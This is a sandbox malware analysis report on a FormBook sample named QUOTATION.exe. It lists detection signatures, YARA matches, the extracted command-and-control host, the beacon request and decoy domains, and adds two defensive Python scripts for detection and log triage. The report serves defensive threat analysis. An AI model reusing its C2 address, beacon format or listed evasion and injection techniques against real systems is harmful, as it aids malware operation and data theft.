Windows Analysis Report QUOTATION.exe

Overview

General Information

Sample Name: QUOTATION.exe
Analysis ID: 532906
MD5: 213d8fd4b74e3b1122cfc1a9159aa579
SHA1: 3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256: 696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}
Multi AV Scanner detection for submitted file
Source: QUOTATION.exe Virustotal: Detection: 40%
Source: QUOTATION.exe ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX Avira URL Cloud: Label: malware
Source: www.purelai.store/p2r0/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe ReversingLabs: Detection: 18%
Antivirus or Machine Learning detection for unpacked file
Source: 17.0.QUOTATION.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.QUOTATION.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: QUOTATION.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: QUOTATION.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 4x nop then pop edi 17_2_00416CEA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 24_2_00746CEA

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.purelai.store
Source: C:\Windows\explorer.exe Network Connect: 208.51.62.42 80
Uses netstat to query active network connections and open ports
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
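
The two findings above (a SysWOW64 utility launched by a binary on the Desktop, and explorer.exe opening an outbound connection) are the observable side of the process hollowing and injection listed in the signatures. The following is an added detection example, not part of the sandbox report: it runs two rules over constructed Sysmon-style Event ID 1 / Event ID 3 records. Image paths, the destination 208.51.62.42:80 and the host name come from the report; the PIDs, the firefox.exe record and the private-address NETSTAT.EXE record are invented for contrast.

```python
"""Added detection example for the two Networking findings above: a
System32/SysWOW64 utility (NETSTAT.EXE) spawned by a binary in a user path,
and a system process (explorer.exe) opening an outbound connection.
Example code, not part of the sandbox report; the event records below are
constructed in Sysmon Event ID 1 / Event ID 3 style, with made-up PIDs."""
import ipaddress

# Constructed sample events. Image paths, the destination IP/port and the
# host name come from the report; PIDs and the benign firefox.exe and
# private-address records are invented for contrast.
EVENTS = [
    {"id": 1, "pid": 4412, "image": r"C:\Users\user\Desktop\QUOTATION.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 5120, "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "parent_image": r"C:\Users\user\Desktop\QUOTATION.exe"},
    {"id": 3, "pid": 3364, "image": r"C:\Windows\explorer.exe",
     "dst_ip": "208.51.62.42", "dst_port": 80, "dst_host": "www.purelai.store"},
    {"id": 3, "pid": 5120, "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "dst_ip": "10.0.0.12", "dst_port": 445, "dst_host": ""},
    {"id": 3, "pid": 7008, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443, "dst_host": "example.com"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_DIRS = ("c:\\users\\",)
# System binaries that do not open internet sockets on their own. FormBook
# hollows a utility such as netstat.exe and injects into explorer.exe, which
# is why both show up in this report's network findings.
NO_INTERNET_IMAGES = {"explorer.exe", "netstat.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _under(path, prefixes):
    return path.lower().startswith(prefixes)


def is_public(ip):
    """True for routable addresses; private, loopback and link-local are not."""
    return ipaddress.ip_address(ip).is_global


def check_process_create(ev):
    """Rule 1: a utility from System32/SysWOW64 whose parent lives under
    C:\\Users (Desktop, AppData, Temp), the launch pattern seen for NETSTAT.EXE."""
    if ev["id"] != 1:
        return None
    if _under(ev["image"], SYSTEM_DIRS) and _under(ev["parent_image"], USER_DIRS):
        return {"rule": "user_path_spawns_system_utility", "pid": ev["pid"],
                "image": ev["image"], "parent_image": ev["parent_image"]}
    return None


def check_network_connect(ev):
    """Rule 2: explorer.exe or netstat.exe connecting to a public address.
    explorer.exe does reach Microsoft services legitimately, so in production
    this needs an allowlist of known destinations; the private-address filter
    keeps file-share traffic out of the alert."""
    if ev["id"] != 3:
        return None
    if _basename(ev["image"]) in NO_INTERNET_IMAGES and is_public(ev["dst_ip"]):
        return {"rule": "system_process_outbound", "pid": ev["pid"],
                "image": ev["image"], "dst": f'{ev["dst_ip"]}:{ev["dst_port"]}',
                "dst_host": ev["dst_host"]}
    return None


def detect(events):
    """Run both rules over a list of events and return the alerts in order."""
    alerts = []
    for ev in events:
        for rule in (check_process_create, check_network_connect):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

Rule 1 alone fires on plenty of benign installers that call cmd.exe or schtasks.exe from a user profile; its value here is correlation, since the same PID that Rule 1 flags (the hollowed NETSTAT.EXE) is the one whose later network or injection activity should be escalated.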
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.purelai.store/p2r0/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1
Host: www.purelai.store
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmp String found in binary or memory: https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L
Source: unknown DNS traffic detected: queries for: www.purelai.store
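
The extracted configuration in the AV Detection section and the User-Agent-less GET above belong together: the C2 entry www.purelai.store/p2r0/ is the host and path of that request, and the same /p2r0/ path shows up in the wildcard.hostgator.com string found in NETSTAT.EXE memory. The following is an added triage example, not part of the sandbox report. It constructs a few proxy log lines (the first reproduces the captured request, the second the truncated hostgator string exactly as the report shows it, the rest are noise), classifies each host against the configuration, and separates what is safe to block from what is only evidence. The decoy list is shortened to four of the 64 entries.

```python
"""Added triage example tying the extracted FormBook configuration (AV
Detection section) to the HTTP GET without a User-Agent shown above.
Example code, not part of the sandbox report. The proxy log lines are
constructed; the first reproduces the captured request, the second the
truncated wildcard.hostgator.com string found in NETSTAT.EXE memory."""
from urllib.parse import urlsplit, parse_qs

# Configuration as printed by the report's extractor; the decoy list is cut
# to four of the 64 entries for space.
CONFIG = {
    "C2 list": ["www.purelai.store/p2r0/"],
    "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "wesleyb.com"],
}

# Constructed proxy log: method, host, URI, User-Agent ("-" when absent).
PROXY_LOG = """\
GET www.purelai.store /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX -
GET wildcard.hostgator.com /p2r0/?U2JXS=zl7ruCTqPiUCF1L -
GET www.purelai.store /favicon.ico Mozilla/5.0
POST www.example.com /api/v1/login python-requests/2.31
"""


def parse_config(config):
    """Split each C2 entry into host -> URI path; decoys are bare host names."""
    c2 = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        c2[host.lower()] = "/" + path
    return c2, {d.lower() for d in config["decoy"]}


def classify_host(host, c2, decoys):
    host = host.lower()
    if host in c2:
        return "c2"
    if host in decoys:
        return "decoy"
    return "unknown"


def parse_line(line):
    method, host, uri, ua = line.split(" ", 3)
    parts = urlsplit(uri)
    return {"method": method, "host": host, "path": parts.path,
            "query": parse_qs(parts.query), "ua": None if ua == "-" else ua}


def triage(log_text, config):
    """Flag C2 contact, and the same URI path sent to other hosts.
    FormBook sends its beacon path to decoy domains as well as the real C2,
    so a path match on a non-C2 host confirms the infection but must not be
    read as a new C2 address."""
    c2, decoys = parse_config(config)
    c2_paths = set(c2.values())
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req = parse_line(line)
        who = classify_host(req["host"], c2, decoys)
        path_hit = req["path"] in c2_paths
        no_ua = req["ua"] is None
        if who == "c2" and path_hit:
            verdict = "c2_beacon"
        elif who == "c2":
            verdict = "c2_host_contact"
        elif path_hit and no_ua:
            verdict = "c2_path_on_other_host"
        else:
            continue
        findings.append({"host": req["host"], "path": req["path"],
                         "host_class": who, "verdict": verdict,
                         "no_user_agent": no_ua,
                         "query_keys": sorted(req["query"])})
    return findings


def block_indicators(config):
    """Only the C2 host/path pairs are safe to block. The decoys are mostly
    legitimate third-party sites the malware contacts to blend in; blocking
    them breaks real traffic without hindering the C2 channel."""
    c2, _ = parse_config(config)
    return {f"{host}{path}" for host, path in c2.items()}


if __name__ == "__main__":
    for f in triage(PROXY_LOG, CONFIG):
        print(f)
    print(block_indicators(CONFIG))
```

The hostgator line is classified as unknown rather than decoy because that host is not in the extracted decoy list; it still carries the beacon path with no User-Agent, which is why the triage keeps it as evidence of the infection rather than discarding it.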

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: QUOTATION.exe
Uses 32bit PE files
Source: QUOTATION.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
